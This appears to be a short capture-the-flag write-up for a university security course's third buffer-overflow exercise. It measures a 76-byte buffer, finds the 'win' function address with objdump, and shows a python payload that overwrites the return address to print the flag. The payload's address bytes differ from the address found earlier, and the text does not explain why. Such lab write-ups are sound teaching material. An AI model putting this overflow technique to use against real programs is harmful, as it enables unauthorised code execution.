This time the code is hidden

Note, I originally attempted this with commit #a798f95. But since then there’s been an updated version, available here

Analysis

We’ll need to find two things

1) The length of the buffer
2) The function address of win

Buffer Length

After an input of 76 characters, we get a segfault - so our buffer array is probably 76 characters. So later when we need to overflow the buffer, we will need to prepend 76 (arbitrary) characters.

Function pointer address

As we don’t have any code, we’ll need to inspect the executable file to find the function pointer address.

1
2
3
4
5
$> objdump -d blind | grep win

---

080484d6 <win>:

Cool, so our address is at 0x080484d6.

Putting these together…

1
2
3
4
5
6
$> python -c 'print("A" * 76 + "\x06\x85\x04\x08")'  | aslr ./blind

---

This is almost exactly the same as jump...
COMP6841{Ooh_Youre_Good}Segmentation fault

Buffer Overflow - 3

Contents

Analysis

Buffer Length

Function pointer address